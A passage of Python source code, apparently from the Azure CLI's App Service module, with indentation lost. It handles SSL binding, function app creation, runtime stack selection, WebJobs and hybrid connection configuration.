raise CLIError("Certificate for thumbprint '{}' not found.".format(certificate_thumbprint))
def bind_ssl_cert(cmd, resource_group_name, name, certificate_thumbprint, ssl_type, slot=None):
SslState = cmd.get_models('SslState')
return _update_ssl_binding(cmd, resource_group_name, name, certificate_thumbprint,
SslState.sni_enabled if ssl_type == 'SNI' else SslState.ip_based_enabled, slot)
def unbind_ssl_cert(cmd, resource_group_name, name, certificate_thumbprint, slot=None):
SslState = cmd.get_models('SslState')
return _update_ssl_binding(cmd, resource_group_name, name,
certificate_thumbprint, SslState.disabled, slot)
def _match_host_names_from_cert(hostnames_from_cert, hostnames_in_webapp):
# the goal is to match '*.foo.com' with host name like 'admin.foo.com', 'logs.foo.com', etc
matched = set()
for hostname in hostnames_from_cert:
if hostname.startswith('*'):
for h in hostnames_in_webapp:
if hostname[hostname.find('.'):] == h[h.find('.'):]:
matched.add(h)
elif hostname in hostnames_in_webapp:
matched.add(hostname)
return matched
# help class handles runtime stack in format like 'node|6.1', 'php|5.5'
class _StackRuntimeHelper:
def __init__(self, cmd, client, linux=False):
self._cmd = cmd
self._client = client
self._linux = linux
self._stacks = []
@staticmethod
def remove_delimiters(runtime):
import re
runtime = re.split('[| :]', runtime) # delimiters allowed: '|', ' ', ':'
return '|'.join(filter(None, runtime))
def resolve(self, display_name):
self._load_stacks_hardcoded()
return next((s for s in self._stacks if s['displayName'].lower() == display_name.lower()),
None)
@property
def stacks(self):
self._load_stacks_hardcoded()
return self._stacks
@staticmethod
def update_site_config(stack, site_config, cmd=None):
for k, v in stack['configs'].items():
setattr(site_config, k, v)
return site_config
@staticmethod
def update_site_appsettings(cmd, stack, site_config):
NameValuePair = cmd.get_models('NameValuePair')
if site_config.app_settings is None:
site_config.app_settings = []
for k, v in stack['configs'].items():
already_in_appsettings = False
for app_setting in site_config.app_settings:
if app_setting.name == k:
already_in_appsettings = True
app_setting.value = v
if not already_in_appsettings:
site_config.app_settings.append(NameValuePair(name=k, value=v))
return site_config
def _load_stacks_hardcoded(self):
if self._stacks:
return
result = []
if self._linux:
result = get_file_json(RUNTIME_STACKS)['linux']
for r in result:
r['setter'] = _StackRuntimeHelper.update_site_config
else: # Windows stacks
result = get_file_json(RUNTIME_STACKS)['windows']
for r in result:
r['setter'] = (_StackRuntimeHelper.update_site_appsettings if 'node' in
r['displayName'] else _StackRuntimeHelper.update_site_config)
self._stacks = result
# Currently using hardcoded values instead of this function. This function calls the stacks API;
# Stacks API is updated with Antares deployments,
# which are infrequent and don't line up with stacks EOL schedule.
def _load_stacks(self):
if self._stacks:
return
os_type = ('Linux' if self._linux else 'Windows')
raw_stacks = self._client.provider.get_available_stacks(os_type_selected=os_type, raw=True)
bytes_value = raw_stacks._get_next().content # pylint: disable=protected-access
json_value = bytes_value.decode('utf8')
json_stacks = json.loads(json_value)
stacks = json_stacks['value']
result = []
if self._linux:
for properties in [(s['properties']) for s in stacks]:
for major in properties['majorVersions']:
default_minor = next((m for m in (major['minorVersions'] or []) if m['isDefault']),
None)
result.append({
'displayName': (default_minor['runtimeVersion']
if default_minor else major['runtimeVersion'])
})
else: # Windows stacks
config_mappings = {
'node': 'WEBSITE_NODE_DEFAULT_VERSION',
'python': 'python_version',
'php': 'php_version',
'aspnet': 'net_framework_version'
}
# get all stack version except 'java'
for stack in stacks:
if stack['name'] not in config_mappings:
continue
name, properties = stack['name'], stack['properties']
for major in properties['majorVersions']:
default_minor = next((m for m in (major['minorVersions'] or []) if m['isDefault']),
None)
result.append({
'displayName': name + '|' + major['displayVersion'],
'configs': {
config_mappings[name]: (default_minor['runtimeVersion']
if default_minor else major['runtimeVersion'])
}
})
# deal with java, which pairs with java container version
java_stack = next((s for s in stacks if s['name'] == 'java'))
java_container_stack = next((s for s in stacks if s['name'] == 'javaContainers'))
for java_version in java_stack['properties']['majorVersions']:
for fx in java_container_stack['properties']['frameworks']:
for fx_version in fx['majorVersions']:
result.append({
'displayName': 'java|{}|{}|{}'.format(java_version['displayVersion'],
fx['display'],
fx_version['displayVersion']),
'configs': {
'java_version': java_version['runtimeVersion'],
'java_container': fx['name'],
'java_container_version': fx_version['runtimeVersion']
}
})
for r in result:
r['setter'] = (_StackRuntimeHelper.update_site_appsettings if 'node' in
r['displayName'] else _StackRuntimeHelper.update_site_config)
self._stacks = result
def get_app_insights_key(cli_ctx, resource_group, name):
appinsights_client = get_mgmt_service_client(cli_ctx, ApplicationInsightsManagementClient)
appinsights = appinsights_client.components.get(resource_group, name)
if appinsights is None or appinsights.instrumentation_key is None:
raise CLIError("App Insights {} under resource group {} was not found.".format(name, resource_group))
return appinsights.instrumentation_key
def create_functionapp_app_service_plan(cmd, resource_group_name, name, is_linux, sku,
number_of_workers=None, max_burst=None, location=None, tags=None):
SkuDescription, AppServicePlan = cmd.get_models('SkuDescription', 'AppServicePlan')
sku = _normalize_sku(sku)
tier = get_sku_name(sku)
if max_burst is not None:
if tier.lower() != "elasticpremium":
raise CLIError("Usage error: --max-burst is only supported for Elastic Premium (EP) plans")
max_burst = validate_range_of_int_flag('--max-burst', max_burst, min_val=0, max_val=20)
if number_of_workers is not None:
number_of_workers = validate_range_of_int_flag('--number-of-workers / --min-elastic-worker-count',
number_of_workers, min_val=0, max_val=20)
client = web_client_factory(cmd.cli_ctx)
if location is None:
location = _get_location_from_resource_group(cmd.cli_ctx, resource_group_name)
sku_def = SkuDescription(tier=tier, name=sku, capacity=number_of_workers)
plan_def = AppServicePlan(location=location, tags=tags, sku=sku_def,
reserved=(is_linux or None), maximum_elastic_worker_count=max_burst,
hyper_v=None, name=name)
return client.app_service_plans.create_or_update(resource_group_name, name, plan_def)
def is_plan_consumption(cmd, plan_info):
SkuDescription, AppServicePlan = cmd.get_models('SkuDescription', 'AppServicePlan')
if isinstance(plan_info, AppServicePlan):
if isinstance(plan_info.sku, SkuDescription):
return plan_info.sku.tier.lower() == 'dynamic'
return False
def is_plan_elastic_premium(cmd, plan_info):
SkuDescription, AppServicePlan = cmd.get_models('SkuDescription', 'AppServicePlan')
if isinstance(plan_info, AppServicePlan):
if isinstance(plan_info.sku, SkuDescription):
return plan_info.sku.tier == 'ElasticPremium'
return False
def validate_and_convert_to_int(flag, val):
try:
return int(val)
except ValueError:
raise CLIError("Usage error: {} is expected to have an int value.".format(flag))
def validate_range_of_int_flag(flag_name, value, min_val, max_val):
value = validate_and_convert_to_int(flag_name, value)
if min_val > value or value > max_val:
raise CLIError("Usage error: {} is expected to be between {} and {} (inclusive)".format(flag_name, min_val,
max_val))
return value
def create_function(cmd, resource_group_name, name, storage_account, plan=None,
os_type=None, functions_version=None, runtime=None, runtime_version=None,
consumption_plan_location=None, app_insights=None, app_insights_key=None,
disable_app_insights=None, deployment_source_url=None,
deployment_source_branch='master', deployment_local_git=None,
docker_registry_server_password=None, docker_registry_server_user=None,
deployment_container_image_name=None, tags=None, assign_identities=None,
role='Contributor', scope=None):
# pylint: disable=too-many-statements, too-many-branches
if functions_version is None:
logger.warning("No functions version specified so defaulting to 2. In the future, specifying a version will "
"be required. To create a 2.x function you would pass in the flag `--functions-version 2`")
functions_version = '2'
if deployment_source_url and deployment_local_git:
raise CLIError('usage error: --deployment-source-url <url> | --deployment-local-git')
if bool(plan) == bool(consumption_plan_location):
raise CLIError("usage error: --plan NAME_OR_ID | --consumption-plan-location LOCATION")
SiteConfig, Site, NameValuePair = cmd.get_models('SiteConfig', 'Site', 'NameValuePair')
docker_registry_server_url = parse_docker_image_name(deployment_container_image_name)
disable_app_insights = (disable_app_insights == "true")
site_config = SiteConfig(app_settings=[])
functionapp_def = Site(location=None, site_config=site_config, tags=tags)
KEYS = FUNCTIONS_STACKS_API_KEYS()
client = web_client_factory(cmd.cli_ctx)
plan_info = None
if runtime is not None:
runtime = runtime.lower()
if consumption_plan_location:
locations = list_consumption_locations(cmd)
location = next((loc for loc in locations if loc['name'].lower() == consumption_plan_location.lower()), None)
if location is None:
raise CLIError("Location is invalid. Use: az functionapp list-consumption-locations")
functionapp_def.location = consumption_plan_location
functionapp_def.kind = 'functionapp'
# if os_type is None, the os type is windows
is_linux = os_type and os_type.lower() == 'linux'
else: # apps with SKU based plan
if is_valid_resource_id(plan):
parse_result = parse_resource_id(plan)
plan_info = client.app_service_plans.get(parse_result['resource_group'], parse_result['name'])
else:
plan_info = client.app_service_plans.get(resource_group_name, plan)
if not plan_info:
raise CLIError("The plan '{}' doesn't exist".format(plan))
location = plan_info.location
is_linux = plan_info.reserved
functionapp_def.server_farm_id = plan
functionapp_def.location = location
if functions_version == '2' and functionapp_def.location in FUNCTIONS_NO_V2_REGIONS:
raise CLIError("2.x functions are not supported in this region. To create a 3.x function, "
"pass in the flag '--functions-version 3'")
if is_linux and not runtime and (consumption_plan_location or not deployment_container_image_name):
raise CLIError(
"usage error: --runtime RUNTIME required for linux functions apps without custom image.")
runtime_stacks_json = _load_runtime_stacks_json_functionapp(is_linux)
if runtime is None and runtime_version is not None:
raise CLIError('Must specify --runtime to use --runtime-version')
# get the matching runtime stack object
runtime_json = _get_matching_runtime_json_functionapp(runtime_stacks_json, runtime if runtime else 'dotnet')
if not runtime_json:
# no matching runtime for os
os_string = "linux" if is_linux else "windows"
supported_runtimes = list(map(lambda x: x[KEYS.NAME], runtime_stacks_json))
raise CLIError("usage error: Currently supported runtimes (--runtime) in {} function apps are: {}."
.format(os_string, ', '.join(supported_runtimes)))
runtime_version_json = _get_matching_runtime_version_json_functionapp(runtime_json,
functions_version,
runtime_version,
is_linux)
if not runtime_version_json:
supported_runtime_versions = list(map(lambda x: x[KEYS.DISPLAY_VERSION],
_get_supported_runtime_versions_functionapp(runtime_json,
functions_version)))
if runtime_version:
if runtime == 'dotnet':
raise CLIError('--runtime-version is not supported for --runtime dotnet. Dotnet version is determined '
'by --functions-version. Dotnet version {} is not supported by Functions version {}.'
.format(runtime_version, functions_version))
raise CLIError('--runtime-version {} is not supported for the selected --runtime {} and '
'--functions-version {}. Supported versions are: {}.'
.format(runtime_version,
runtime,
functions_version,
', '.join(supported_runtime_versions)))
# if runtime_version was not specified, then that runtime is not supported for that functions version
raise CLIError('no supported --runtime-version found for the selected --runtime {} and '
'--functions-version {}'
.format(runtime, functions_version))
if runtime == 'dotnet':
logger.warning('--runtime-version is not supported for --runtime dotnet. Dotnet version is determined by '
'--functions-version. Dotnet version will be %s for this function app.',
runtime_version_json[KEYS.DISPLAY_VERSION])
if runtime_version_json[KEYS.IS_DEPRECATED]:
logger.warning('%s version %s has been deprecated. In the future, this version will be unavailable. '
'Please update your command to use a more recent version. For a list of supported '
'--runtime-versions, run \"az functionapp create -h\"',
runtime_json[KEYS.PROPERTIES][KEYS.DISPLAY], runtime_version_json[KEYS.DISPLAY_VERSION])
site_config_json = runtime_version_json[KEYS.SITE_CONFIG_DICT]
app_settings_json = runtime_version_json[KEYS.APP_SETTINGS_DICT]
con_string = _validate_and_get_connection_string(cmd.cli_ctx, resource_group_name, storage_account)
if is_linux:
functionapp_def.kind = 'functionapp,linux'
functionapp_def.reserved = True
is_consumption = consumption_plan_location is not None
if not is_consumption:
site_config.app_settings.append(NameValuePair(name='MACHINEKEY_DecryptionKey',
value=str(hexlify(urandom(32)).decode()).upper()))
if deployment_container_image_name:
functionapp_def.kind = 'functionapp,linux,container'
site_config.app_settings.append(NameValuePair(name='DOCKER_CUSTOM_IMAGE_NAME',
value=deployment_container_image_name))
site_config.app_settings.append(NameValuePair(name='FUNCTION_APP_EDIT_MODE', value='readOnly'))
site_config.app_settings.append(NameValuePair(name='WEBSITES_ENABLE_APP_SERVICE_STORAGE',
value='false'))
site_config.linux_fx_version = _format_fx_version(deployment_container_image_name)
# clear all runtime specific configs and settings
site_config_json = {KEYS.USE_32_BIT_WORKER_PROC: False}
app_settings_json = {}
# ensure that app insights is created if not disabled
runtime_version_json[KEYS.APPLICATION_INSIGHTS] = True
else:
site_config.app_settings.append(NameValuePair(name='WEBSITES_ENABLE_APP_SERVICE_STORAGE',
value='true'))
else:
functionapp_def.kind = 'functionapp'
# set site configs
for prop, value in site_config_json.items():
snake_case_prop = _convert_camel_to_snake_case(prop)
setattr(site_config, snake_case_prop, value)
# adding app settings
for app_setting, value in app_settings_json.items():
site_config.app_settings.append(NameValuePair(name=app_setting, value=value))
site_config.app_settings.append(NameValuePair(name='FUNCTIONS_EXTENSION_VERSION',
value=_get_extension_version_functionapp(functions_version)))
site_config.app_settings.append(NameValuePair(name='AzureWebJobsStorage', value=con_string))
# If plan is not consumption or elastic premium, we need to set always on
if consumption_plan_location is None and not is_plan_elastic_premium(cmd, plan_info):
site_config.always_on = True
# If plan is elastic premium or windows consumption, we need these app settings
is_windows_consumption = consumption_plan_location is not None and not is_linux
if is_plan_elastic_premium(cmd, plan_info) or is_windows_consumption:
site_config.app_settings.append(NameValuePair(name='WEBSITE_CONTENTAZUREFILECONNECTIONSTRING',
value=con_string))
site_config.app_settings.append(NameValuePair(name='WEBSITE_CONTENTSHARE', value=name.lower()))
create_app_insights = False
if app_insights_key is not None:
site_config.app_settings.append(NameValuePair(name='APPINSIGHTS_INSTRUMENTATIONKEY',
value=app_insights_key))
elif app_insights is not None:
instrumentation_key = get_app_insights_key(cmd.cli_ctx, resource_group_name, app_insights)
site_config.app_settings.append(NameValuePair(name='APPINSIGHTS_INSTRUMENTATIONKEY',
value=instrumentation_key))
elif disable_app_insights or not runtime_version_json[KEYS.APPLICATION_INSIGHTS]:
# set up dashboard if no app insights
site_config.app_settings.append(NameValuePair(name='AzureWebJobsDashboard', value=con_string))
elif not disable_app_insights and runtime_version_json[KEYS.APPLICATION_INSIGHTS]:
create_app_insights = True
poller = client.web_apps.create_or_update(resource_group_name, name, functionapp_def)
functionapp = LongRunningOperation(cmd.cli_ctx)(poller)
if consumption_plan_location and is_linux:
logger.warning("Your Linux function app '%s', that uses a consumption plan has been successfully "
"created but is not active until content is published using "
"Azure Portal or the Functions Core Tools.", name)
else:
_set_remote_or_local_git(cmd, functionapp, resource_group_name, name, deployment_source_url,
deployment_source_branch, deployment_local_git)
if create_app_insights:
try:
try_create_application_insights(cmd, functionapp)
except Exception: # pylint: disable=broad-except
logger.warning('Error while trying to create and configure an Application Insights for the Function App. '
'Please use the Azure Portal to create and configure the Application Insights, if needed.')
update_app_settings(cmd, functionapp.resource_group, functionapp.name,
['AzureWebJobsDashboard={}'.format(con_string)])
if deployment_container_image_name:
update_container_settings_functionapp(cmd, resource_group_name, name, docker_registry_server_url,
deployment_container_image_name, docker_registry_server_user,
docker_registry_server_password)
if assign_identities is not None:
identity = assign_identity(cmd, resource_group_name, name, assign_identities,
role, None, scope)
functionapp.identity = identity
return functionapp
def _load_runtime_stacks_json_functionapp(is_linux):
KEYS = FUNCTIONS_STACKS_API_KEYS()
if is_linux:
return get_file_json(FUNCTIONS_STACKS_API_JSON_PATHS['linux'])[KEYS.VALUE]
return get_file_json(FUNCTIONS_STACKS_API_JSON_PATHS['windows'])[KEYS.VALUE]
def _get_matching_runtime_json_functionapp(stacks_json, runtime):
KEYS = FUNCTIONS_STACKS_API_KEYS()
matching_runtime_json = list(filter(lambda x: x[KEYS.NAME] == runtime, stacks_json))
if matching_runtime_json:
return matching_runtime_json[0]
return None
def _get_supported_runtime_versions_functionapp(runtime_json, functions_version):
KEYS = FUNCTIONS_STACKS_API_KEYS()
extension_version = _get_extension_version_functionapp(functions_version)
supported_versions_list = []
for runtime_version_json in runtime_json[KEYS.PROPERTIES][KEYS.MAJOR_VERSIONS]:
if extension_version in runtime_version_json[KEYS.SUPPORTED_EXTENSION_VERSIONS]:
supported_versions_list.append(runtime_version_json)
return supported_versions_list
def _get_matching_runtime_version_json_functionapp(runtime_json, functions_version, runtime_version, is_linux):
KEYS = FUNCTIONS_STACKS_API_KEYS()
extension_version = _get_extension_version_functionapp(functions_version)
if runtime_version:
for runtime_version_json in runtime_json[KEYS.PROPERTIES][KEYS.MAJOR_VERSIONS]:
if (runtime_version_json[KEYS.DISPLAY_VERSION] == runtime_version and
extension_version in runtime_version_json[KEYS.SUPPORTED_EXTENSION_VERSIONS]):
return runtime_version_json
return None
# find the matching default runtime version
supported_versions_list = _get_supported_runtime_versions_functionapp(runtime_json, functions_version)
default_version_json = {}
default_version = 0.0
for current_runtime_version_json in supported_versions_list:
if current_runtime_version_json[KEYS.IS_DEFAULT]:
current_version = _get_runtime_version_functionapp(current_runtime_version_json[KEYS.RUNTIME_VERSION],
is_linux)
if not default_version_json or default_version < current_version:
default_version_json = current_runtime_version_json
default_version = current_version
return default_version_json
def _get_extension_version_functionapp(functions_version):
if functions_version is not None:
return '~{}'.format(functions_version)
return '~2'
def _get_app_setting_set_functionapp(site_config, app_setting):
return list(filter(lambda x: x.name == app_setting, site_config.app_settings))
def _convert_camel_to_snake_case(text):
return reduce(lambda x, y: x + ('_' if y.isupper() else '') + y, text).lower()
def _get_runtime_version_functionapp(version_string, is_linux):
import re
windows_match = re.fullmatch(FUNCTIONS_WINDOWS_RUNTIME_VERSION_REGEX, version_string)
if windows_match:
return float(windows_match.group(1))
linux_match = re.fullmatch(FUNCTIONS_LINUX_RUNTIME_VERSION_REGEX, version_string)
if linux_match:
return float(linux_match.group(1))
try:
return float(version_string)
except ValueError:
return 0
def try_create_application_insights(cmd, functionapp):
creation_failed_warn = 'Unable to create the Application Insights for the Function App. ' \
'Please use the Azure Portal to manually create and configure the Application Insights, ' \
'if needed.'
ai_resource_group_name = functionapp.resource_group
ai_name = functionapp.name
ai_location = functionapp.location
app_insights_client = get_mgmt_service_client(cmd.cli_ctx, ApplicationInsightsManagementClient)
ai_properties = {
"name": ai_name,
"location": ai_location,
"kind": "web",
"properties": {
"Application_Type": "web"
}
}
appinsights = app_insights_client.components.create_or_update(ai_resource_group_name, ai_name, ai_properties)
if appinsights is None or appinsights.instrumentation_key is None:
logger.warning(creation_failed_warn)
return
# We make this success message as a warning to no interfere with regular JSON output in stdout
logger.warning('Application Insights \"%s\" was created for this Function App. '
'You can visit https://portal.azure.com/#resource%s/overview to view your '
'Application Insights component', appinsights.name, appinsights.id)
update_app_settings(cmd, functionapp.resource_group, functionapp.name,
['APPINSIGHTS_INSTRUMENTATIONKEY={}'.format(appinsights.instrumentation_key)])
def _set_remote_or_local_git(cmd, webapp, resource_group_name, name, deployment_source_url=None,
deployment_source_branch='master', deployment_local_git=None):
if deployment_source_url:
logger.warning("Linking to git repository '%s'", deployment_source_url)
try:
config_source_control(cmd, resource_group_name, name, deployment_source_url, 'git',
deployment_source_branch, manual_integration=True)
except Exception as ex: # pylint: disable=broad-except
ex = ex_handler_factory(no_throw=True)(ex)
logger.warning("Link to git repository failed due to error '%s'", ex)
if deployment_local_git:
local_git_info = enable_local_git(cmd, resource_group_name, name)
logger.warning("Local git is configured with url of '%s'", local_git_info['url'])
setattr(webapp, 'deploymentLocalGitUrl', local_git_info['url'])
def _validate_and_get_connection_string(cli_ctx, resource_group_name, storage_account):
sa_resource_group = resource_group_name
if is_valid_resource_id(storage_account):
sa_resource_group = parse_resource_id(storage_account)['resource_group']
storage_account = parse_resource_id(storage_account)['name']
storage_client = get_mgmt_service_client(cli_ctx, StorageManagementClient)
storage_properties = storage_client.storage_accounts.get_properties(sa_resource_group,
storage_account)
error_message = ''
endpoints = storage_properties.primary_endpoints
sku = storage_properties.sku.name
allowed_storage_types = ['Standard_GRS', 'Standard_RAGRS', 'Standard_LRS', 'Standard_ZRS', 'Premium_LRS']
for e in ['blob', 'queue', 'table']:
if not getattr(endpoints, e, None):
error_message = "Storage account '{}' has no '{}' endpoint. It must have table, queue, and blob endpoints all enabled".format(storage_account, e) # pylint: disable=line-too-long
if sku not in allowed_storage_types:
error_message += 'Storage type {} is not allowed'.format(sku)
if error_message:
raise CLIError(error_message)
obj = storage_client.storage_accounts.list_keys(sa_resource_group, storage_account) # pylint: disable=no-member
try:
keys = [obj.keys[0].value, obj.keys[1].value] # pylint: disable=no-member
except AttributeError:
# Older API versions have a slightly different structure
keys = [obj.key1, obj.key2] # pylint: disable=no-member
endpoint_suffix = cli_ctx.cloud.suffixes.storage_endpoint
connection_string = 'DefaultEndpointsProtocol={};EndpointSuffix={};AccountName={};AccountKey={}'.format(
"https",
endpoint_suffix,
storage_account,
keys[0]) # pylint: disable=no-member
return connection_string
def list_consumption_locations(cmd):
client = web_client_factory(cmd.cli_ctx)
regions = client.list_geo_regions(sku='Dynamic')
return [{'name': x.name.lower().replace(' ', '')} for x in regions]
def list_locations(cmd, sku, linux_workers_enabled=None):
web_client = web_client_factory(cmd.cli_ctx)
full_sku = get_sku_name(sku)
web_client_geo_regions = web_client.list_geo_regions(sku=full_sku, linux_workers_enabled=linux_workers_enabled)
providers_client = providers_client_factory(cmd.cli_ctx)
providers_client_locations_list = getattr(providers_client.get('Microsoft.Web'), 'resource_types', [])
for resource_type in providers_client_locations_list:
if resource_type.resource_type == 'sites':
providers_client_locations_list = resource_type.locations
break
return [geo_region for geo_region in web_client_geo_regions if geo_region.name in providers_client_locations_list]
def _check_zip_deployment_status(cmd, rg_name, name, deployment_status_url, authorization, timeout=None):
import requests
from azure.cli.core.util import should_disable_connection_verify
total_trials = (int(timeout) // 2) if timeout else 450
num_trials = 0
while num_trials < total_trials:
time.sleep(2)
response = requests.get(deployment_status_url, headers=authorization,
verify=not should_disable_connection_verify())
try:
res_dict = response.json()
except json.decoder.JSONDecodeError:
logger.warning("Deployment status endpoint %s returns malformed data. Retrying...", deployment_status_url)
res_dict = {}
finally:
num_trials = num_trials + 1
if res_dict.get('status', 0) == 3:
_configure_default_logging(cmd, rg_name, name)
raise CLIError("Zip deployment failed. {}. Please run the command az webapp log deployment show "
"-n {} -g {}".format(res_dict, name, rg_name))
if res_dict.get('status', 0) == 4:
break
if 'progress' in res_dict:
logger.info(res_dict['progress']) # show only in debug mode, customers seem to find this confusing
# if the deployment is taking longer than expected
if res_dict.get('status', 0) != 4:
_configure_default_logging(cmd, rg_name, name)
raise CLIError("""Timeout reached by the command, however, the deployment operation
is still on-going. Navigate to your scm site to check the deployment status""")
return res_dict
def list_continuous_webjobs(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_continuous_web_jobs', slot)
def start_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.start_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.get_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
client.web_apps.start_continuous_web_job(resource_group_name, name, webjob_name)
return client.web_apps.get_continuous_web_job(resource_group_name, name, webjob_name)
def stop_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.stop_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.get_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
client.web_apps.stop_continuous_web_job(resource_group_name, name, webjob_name)
return client.web_apps.get_continuous_web_job(resource_group_name, name, webjob_name)
def remove_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.delete_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.delete_continuous_web_job(resource_group_name, name, webjob_name)
def list_triggered_webjobs(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_triggered_web_jobs', slot)
def run_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.run_triggered_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.get_triggered_web_job_slot(resource_group_name, name, webjob_name, slot)
client.web_apps.run_triggered_web_job(resource_group_name, name, webjob_name)
return client.web_apps.get_triggered_web_job(resource_group_name, name, webjob_name)
def remove_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.delete_triggered_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.delete_triggered_web_job(resource_group_name, name, webjob_name)
def list_hc(cmd, name, resource_group_name, slot=None):
linux_webapp = show_webapp(cmd, resource_group_name, name, slot)
is_linux = linux_webapp.reserved
if is_linux:
return logger.warning("hybrid connections not supported on a linux app.")
client = web_client_factory(cmd.cli_ctx)
if slot is None:
listed_vals = client.web_apps.list_hybrid_connections(resource_group_name, name)
else:
listed_vals = client.web_apps.list_hybrid_connections_slot(resource_group_name, name, slot)
# reformats hybrid connection, to prune unnecessary fields
mod_list = []
for x in listed_vals.additional_properties["value"]:
properties = x["properties"]
resourceGroup = x["id"].split("/")
mod_hc = {
"id": x["id"],
"location": x["location"],
"name": x["name"],
"properties": {
"hostname": properties["hostname"],
"port": properties["port"],
"relayArmUri": properties["relayArmUri"],
"relayName": properties["relayName"],
"serviceBusNamespace": properties["serviceBusNamespace"],
"serviceBusSuffix": properties["serviceBusSuffix"]
},
"resourceGroup": resourceGroup[4],
"type": x["type"]
}
mod_list.append(mod_hc)
return mod_list
def add_hc(cmd, name, resource_group_name, namespace, hybrid_connection, slot=None):
HybridConnection = cmd.get_models('HybridConnection')
linux_webapp = show_webapp(cmd, resource_group_name, name, slot)
is_linux = linux_webapp.reserved
if is_linux:
return logger.warning("hybrid connections not supported on a linux app.")
web_client = web_client_factory(cmd.cli_ctx)
hy_co_client = hycos_mgmt_client_factory(cmd.cli_ctx, cmd.cli_ctx)
namespace_client = namespaces_mgmt_client_factory(cmd.cli_ctx, cmd.cli_ctx)
hy_co_id = ''
for n in namespace_client.list():
if n.name == namespace:
hy_co_id = n.id
i = 0
hy_co_resource_group = ''
hy_co_split = hy_co_id.split("/")
for z in hy_co_split:
if z == "resourceGroups":
hy_co_resource_group = hy_co_split[i + 1]
i = i + 1
# calling the relay API to get information about the hybrid connection
hy_co = hy_co_client.get(hy_co_resource_group, namespace, hybrid_connection)
# if the hybrid connection does not have a default sender authorization
# rule, create it
hy_co_rules = hy_co_client.list_authorization_rules(hy_co_resource_group, namespace, hybrid_connection)
has_default_sender_key = False
for r in hy_co_rules:
if r.name.lower() == "defaultsender":
for z in r.rights:
if z == z.send:
has_default_sender_key = True
if not has_default_sender_key:
rights = [AccessRights.send]
hy_co_client.create_or_update_authorization_rule(hy_co_resource_group, namespace, hybrid_connection,
"defaultSender", rights)
hy_co_keys = hy_co_client.list_keys(hy_co_resource_group, namespace, hybrid_connection, "defaultSender")
hy_co_info = hy_co.id
hy_co_metadata = ast.literal_eval(hy_co.user_metadata)
hy_co_hostname = ''
for x in hy_co_metadata:
if x["key"] == "endpoint":
hy_co_hostname = x["value"]
hostname_parts = hy_co_hostname.split(":")
hostname = hostname_parts[0]
port = hostname_parts[1]
id_parameters = hy_co_info.split("/")
# populate object with information from the hybrid connection, and set it
# on webapp
hc = HybridConnection(service_bus_namespace=id_parameters[8],
relay_name=hybrid_connection,
relay_arm_uri=hy_co_info,
hostname=hostname,
port=port,
send_key_name="defaultSender",
send_key_value=hy_co_keys.primary_key,
service_bus_suffix=".servicebus.windows.net")
if slot is None:
return_hc = web_client.web_apps.create_or_update_hybrid_connection(resource_group_name, name, namespace,
hybrid_connection, hc)
else:
return_hc = web_client.web_apps.create_or_update_hybrid_connection_slot(resource_group_name, name, namespace,
hybrid_connection, hc, slot)
# reformats hybrid connection, to prune unnecessary fields
resourceGroup = return_hc.id.split("/")
mod_hc = {
"hostname": return_hc.hostname,
"id": return_hc.id,
"location": return_hc.additional_properties["location"],
"name": return_hc.name,
"port": return_hc.port,
"relayArmUri": return_hc.relay_arm_uri,
"resourceGroup": resourceGroup[4],
"serviceBusNamespace": return_hc.service_bus_namespace,
"serviceBusSuffix": return_hc.service_bus_suffix
}
return mod_hc
# set the key the apps use to connect with the hybrid connection
def set_hc_key(cmd, plan, resource_group_name, namespace, hybrid_connection, key_type):
HybridConnection = cmd.get_models('HybridConnection')
web_client = web_client_factory(cmd.cli_ctx)
# extract the hybrid connection resource group
asp_hy_co = web_client.app_service_plans.get_hybrid_connection(resource_group_name, plan,
namespace, hybrid_connection)
arm_uri = asp_hy_co.relay_arm_uri
split_uri = arm_uri.split("resourceGroups/")
resource_group_strings = split_uri[1].split('/')
relay_resource_group = resource_group_strings[0]
hy_co_client = hycos_mgmt_client_factory(cmd.cli_ctx, cmd.cli_ctx)
# calling the relay function to obtain information about the hc in question
hy_co = hy_co_client.get(relay_resource_group, namespace, hybrid_connection)
# if the hybrid connection does not have a default sender authorization
# rule, create it
hy_co_rules = hy_co_client.list_authorization_rules(relay_resource_group, namespace, hybrid_connection)
has_default_sender_key = False
for r in hy_co_rules:
if r.name.lower() == "defaultsender":
for z in r.rights:
if z == z.send:
has_default_sender_key = True
if not has_default_sender_key:
rights = [AccessRights.send]
hy_co_client.create_or_update_authorization_rule(relay_resource_group, namespace, hybrid_connection,
"defaultSender", rights)
hy_co_keys = hy_co_client.list_keys(relay_resource_group, namespace, hybrid_connection, "defaultSender")
hy_co_metadata = ast.literal_eval(hy_co.user_metadata)
hy_co_hostname = 0
for x in hy_co_metadata:
if x["key"] == "endpoint":
hy_co_hostname = x["value"]
hostname_parts = hy_co_hostname.split(":")
hostname = hostname_parts[0]
port = hostname_parts[1]
key = "empty"
if key_type.lower() == "primary":
key = hy_co_keys.primary_key
elif key_type.lower() == "secondary":
key = hy_co_keys.secondary_key
# enures input is correct
if key == "empty":
logger.warning("Key type is invalid - must be primary or secondary")
return
apps = web_client.app_service_plans.list_web_apps_by_hybrid_connection(resource_group_name, plan, namespace,
hybrid_connection)
# changes the key for every app that uses that hybrid connection
for x in apps:
app_info = ast.literal_eval(x)
app_name = app_info["name"]
app_id = app_info["id"]
